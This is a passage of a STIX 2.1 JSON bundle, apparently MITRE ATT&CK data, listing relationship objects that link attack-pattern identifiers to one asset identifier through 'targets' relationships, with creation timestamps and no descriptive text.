"0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--32139ac1-217f-4589-b024-1b0b1c65cd42", "created": "2024-07-01T10:37:15.828949", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828951", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--17939168-757a-4408-8afa-89b177683483", "created": "2024-07-01T10:37:15.828959", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828961", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--26856d13-208e-4544-b40d-16bae0966640", "created": "2024-07-01T10:37:15.828969", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828971", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--389735f1-f21c-4208-b8f0-f8031e7169b8", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--85e53fc7-fc08-49b1-850d-9b3fd9eff1f4", "created": "2024-07-01T10:37:15.828978", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828981", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--38eb0c22-6caf-46ce-8869-5964bd735858", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8a3fcdb8-d09c-4523-b5a9-e2f19c17464b", "created": "2024-07-01T10:37:15.828988", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828990", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--39131305-9282-45e4-ac3b-591d2d4fc3ef", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e5a00aff-e0ab-4ffd-a392-734982ef71bf", "created": "2024-07-01T10:37:15.828998", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829001", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--84b1ea1e-56ae-40c7-b85f-55af95567637", "created": "2024-07-01T10:37:15.829009", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829011", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3975dbb5-0e1e-4f5b-bae1-cf2ab84b46dc", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b8c46f1b-8e93-449b-b432-13ac5062f73a", "created": "2024-07-01T10:37:15.829019", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829021", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3c4fc8f7-484f-4d9d-88d3-037affa35f5c", "created": "2024-07-01T10:37:15.829029", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829031", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3a32740a-11b0-4bcf-b0a9-3abd0f6d3cd5", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f0a5465d-2ca8-4f62-981a-2504e432bf70", "created": "2024-07-01T10:37:15.829039", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829041", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--49cf40b4-e56e-4b69-8228-dfefee2bb12f", "created": "2024-07-01T10:37:15.829049", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829051", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3fb90ed7-a06c-4c6f-a2c8-85e3edb44398", "created": "2024-07-01T10:37:15.829059", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829061", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fe5e85fa-1d3b-4994-874b-1b1219766217", "created": "2024-07-01T10:37:15.829069", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829071", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9853de27-7f7c-453f-980d-c3806e64e1d8", "created": "2024-07-01T10:37:15.829079", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829081", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ac34ba56-cbc4-4d10-bc0b-b919dc8c07a9", "created": "2024-07-01T10:37:15.829088", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829090", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1377ca28-0ad7-4db4-8622-6ea9e668fbd8", "created": "2024-07-01T10:37:15.829098", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829102", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cb12f0fb-9e3e-4579-87c0-22e616e753ce", "created": "2024-07-01T10:37:15.829111", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829113", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c970ceea-c4b4-47ea-a12c-91ee4d077584", "created": "2024-07-01T10:37:15.829121", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829123", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9ca5a9ce-ada8-4b86-8126-0f22e00e8e22", "created": "2024-07-01T10:37:15.829131", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829133", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3fc01293-ef5e-41c6-86ce-61f10706b64a", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4af9bac1-4eb7-40f4-91f6-0e7d6bac87a4", "created": "2024-07-01T10:37:15.829141", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829143", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--21ad8cd8-0e04-477a-9187-f72db3a28db4", "created": "2024-07-01T10:37:15.829151", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829153", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--40597f16-0963-4249-bf4c-ac93b7fb9807", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bb1a08e0-4c44-437a-b4ff-0b89ddb53085", "created": "2024-07-01T10:37:15.829161", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829163", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--19aee00a-a897-4c68-8bfa-cf63487f0cab", "created": "2024-07-01T10:37:15.829171", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829173", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--41868330-6ee2-4d0f-b743-9f2294c3c9b6", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--96aa1b3c-10f1-4752-8b73-e40bc9f6364f", "created": "2024-07-01T10:37:15.829181", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829183", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--41d9846c-f6af-4302-a654-24bba2729bc6", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8e2ed9b9-06ac-4a8e-9969-058e1d548968", "created": "2024-07-01T10:37:15.829191", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829193", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--257d9819-07b7-4619-a495-43315c8ed46e", "created": "2024-07-01T10:37:15.829201", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829203", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4138df7f-b0b8-4231-be0b-97dc015da1c7", "created": "2024-07-01T10:37:15.829211", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829213", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2ecf82ff-60f8-43db-b34a-6d6ddc9db517", "created": "2024-07-01T10:37:15.829220", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829223", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--43881e51-ac74-445b-b4c6-f9f9e9bf23fe", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--74819cb5-94ff-4c6b-bd10-b20160f5d5a0", "created": "2024-07-01T10:37:15.829230", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829233", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--438c967d-3996-4870-bfc2-3954752a1927", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--45ae976d-3315-4389-9800-17a19a2e1e68", "created": "2024-07-01T10:37:15.829241", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829243", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--43c9bc06-715b-42db-972f-52d25c09a20c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1696e23a-569b-4c1e-8294-41c9566950f2", "created": "2024-07-01T10:37:15.829250", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829252", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2717401d-3066-45dd-b681-f00058bc8803", "created": "2024-07-01T10:37:15.829260", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829262", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--43f2776f-b4bd-4118-94b8-fee47e69676d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dddb0a09-124a-4226-b36a-6e1f97485224", "created": "2024-07-01T10:37:15.829270", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829272", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1fcc577a-495e-4b98-a265-30fca474f92e", "created": "2024-07-01T10:37:15.829280", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829282", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--75c58bc0-32b9-4442-bfcf-3565b6fbb6b4", "created": "2024-07-01T10:37:15.829290", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829292", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d17ca923-90fc-497d-b879-c63da26640e6", "created": "2024-07-01T10:37:15.829300", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829302", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4933e63b-9b77-476e-ab29-761bc5b7d15a", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3376ade5-8fe1-48d2-8c32-5e872d8657db", "created": "2024-07-01T10:37:15.829310", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829312", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--494ab9f0-36e0-4b06-b10d-57285b040a06", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2c2eacd9-6073-4071-8905-0f230e73d613", "created": "2024-07-01T10:37:15.829320", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829322", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4a2975db-414e-4c0c-bd92-775987514b4b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--df7d0672-772d-4742-aa5a-50fe774bad4e", "created": "2024-07-01T10:37:15.829330", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829332", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4a5b7ade-8bb5-4853-84ed-23f262002665", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--da773eaa-8e6f-4f6f-a919-055f775aa6d4", "created": "2024-07-01T10:37:15.829339", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829342", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8df9034d-df5d-4ee7-a3a2-e708d971aeb0", "created": "2024-07-01T10:37:15.829349", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829351", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b2cc0a70-d4c4-4842-a9a4-bf12568215bc", "created": "2024-07-01T10:37:15.829359", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, 